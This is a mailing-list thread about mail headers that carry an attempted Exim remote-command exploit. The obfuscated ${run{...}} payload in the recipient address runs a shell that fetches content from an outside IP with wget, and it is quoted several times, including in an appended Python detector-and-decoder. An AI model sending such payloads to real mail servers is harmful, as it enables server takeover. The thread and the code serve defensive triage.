Mailing List Archive

Shell commands in Received and Delivered-To headers
Hi all,

Anyone have a guess on what this is trying to accomplish?

From root@sab.com Thu Jul 11 11:05:10 2019
Return-Path: <root@sab.com>
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: username@example.com
Received: by host.example.com (Postfix)
id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
Delivered-To:
root+${run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Received: from sab.com (ns3.nodename.ru [89.104.77.8])
by host.example.com (Postfix) with SMTP id 78E6F120294
for
<root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
Thu, 11 Jul 2019 11:05:10 -0400 (EDT)

The IPs and host.example.com have been changed, but it's otherwise as
received. Is it a failed attempt at trying to generate a random string,
or to exploit some parser?
Re: Shell commands in Received and Delivered-To headers
It is an attempted Exim exploit. Lmk if you need more info.

On Thu, Jul 11, 2019, 11:54 Dave Wreski <dwreski@guardiandigital.com> wrote:

> Hi all,
>
> Anyone have a guess on what this is trying to accomplish?
>
> From root@sab.com Thu Jul 11 11:05:10 2019
> Return-Path: <root@sab.com>
> X-Original-To:
> root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Delivered-To: username@example.com
> Received: by host.example.com (Postfix)
> id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
> Delivered-To:
> root+${
> run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Received: from sab.com (ns3.nodename.ru [89.104.77.8])
> by host.example.com (Postfix) with SMTP id 78E6F120294
> for
> <root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
>
> Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
>
> The IPs and host.example.com have been changed, but it's otherwise as
> received. Is it a failed attempt at trying to generate a random string,
> or to exploit some parser?
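An added example, not from the thread, showing the triage a mail admin would do on headers like these: unfold them, flag any Exim `${run{...}}` string-expansion item sitting in a recipient address, and decode the `xHH` obfuscation so the embedded command is readable. The sample headers are constructed from the ones posted above; the decoder assumes the `xHH` runs are `\xHH` escapes whose backslash was stripped in transit.

```python
import re
# Constructed sample: the thread's headers re-folded as on the wire (continuation
# lines start with whitespace); the ${run{...}} text is the page's own payload.
SAMPLE_HEADERS = (
    "X-Original-To:\r\n"
    " root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com\r\n"
    "Delivered-To: username@example.com\r\n"
    "Received: from sab.com (ns3.nodename.ru [89.104.77.8])\r\n"
    " by host.example.com (Postfix) with SMTP id 78E6F120294\r\n"
    " for <root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;\r\n"
    " Thu, 11 Jul 2019 11:05:10 -0400 (EDT)\r\n"
)
# An Exim string-expansion item has the form ${name{args}}; ${run{cmd}} runs cmd.
RUN_ITEM_RE = re.compile(r"\$\{run\{", re.IGNORECASE)
# Assumption: the xHH runs are \xHH escapes that lost their backslash in transit,
# so they decode to '/', ' ' and '"'; the bare 't' runs are left as they are.
HEX_ESCAPE_RE = re.compile(r"x([0-9a-fA-F]{2})")

def unfold_headers(raw):
    """Return [(name, value)] with RFC 5322 folding undone; mbox From lines are skipped."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            fields[-1][1] = (fields[-1][1] + " " + line.strip()).strip()
            continue
        name, sep, value = line.partition(":")
        if sep and name and " " not in name:
            fields.append([name, value.strip()])
    return [tuple(f) for f in fields]

def balanced_item(text, start):
    """Return the ${...} item beginning at `start`, honouring nested braces."""
    depth = 0
    for i in range(start, len(text)):
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        if depth == 0 and i > start:
            return text[start:i + 1]
    return text[start:]

def decode_escapes(s):
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)

def find_expansion_payloads(raw):
    """Flag every header carrying ${run{...}}: (header name, raw item, decoded command)."""
    hits = []
    for name, value in unfold_headers(raw):
        for m in RUN_ITEM_RE.finditer(value):
            item = balanced_item(value, m.start())
            hits.append((name, item, decode_escapes(item[len("${run{"):-2])))
    return hits
```

Run against the real envelope recipient (the `for <...>` clause of the Received line or the MTA's RCPT TO log) rather than only the message body, since that is where the expansion item was delivered.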